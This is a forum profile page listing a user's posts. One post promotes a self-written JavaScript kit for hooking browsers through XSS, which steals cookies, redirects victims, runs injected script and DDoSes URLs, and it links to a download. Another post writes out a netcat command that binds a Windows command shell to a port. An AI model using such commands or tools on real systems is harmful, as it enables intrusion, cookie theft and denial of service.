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Everything posted by Saustin

  1. Yeah some kid registered that before me.. That isn't mine.
  2. Hey guys. Please post comments on what you think. Leechers just scroll down. I came to this forum for 3 reasons: 1. I love the show. I watch it every chance [never] I get. 2. Because irongeek is leet. 3. I needed a community to post my new project: SJSEK I coded this for 2 reasons: 1. I'm bored. 2. BeEF is detectable as HELL. What is this? SJSEK: S - Saustin's J - Java S - Script E - Exploitation [it doesn't exploit anything, by the way] K - Kit Q. What does it DO? A. There are six commands you can issue: 1. Visit a link [iframed] 2. Steal a cookie 3. Send a alert 4. Run JavaScript Code [One line] 5. Redirect to different URL 6. DDoS a URL. Q. Does this exploit anything? A. Technically, no. You can have this INSIDE of a XSS exploit, or even a iframe. Q. What is inside of the .zip? A. command.txt commander.php index.html Perl Editor.pl Windows Editor [Yes I know vb6 sucks] Q. What do I need to set this up? A. PHP, and a server. Perl isn't required, and windows isn't either, but it's recommended. If you have ANY other questions, PLEASE PLEASE PLEASE ask them. Oh, by the way I'm not a bragger but I'm 14 ><. URL: http://uppit.com/v/25EOU4IJ Credits: Myself w3schools
  3. Guys, it works. The problem is that it hides the GUI. For example, if you had netcat installed onto your machine and you executed "at 12:20 'nc.exe 555 -e cmd.exe'" it would work.
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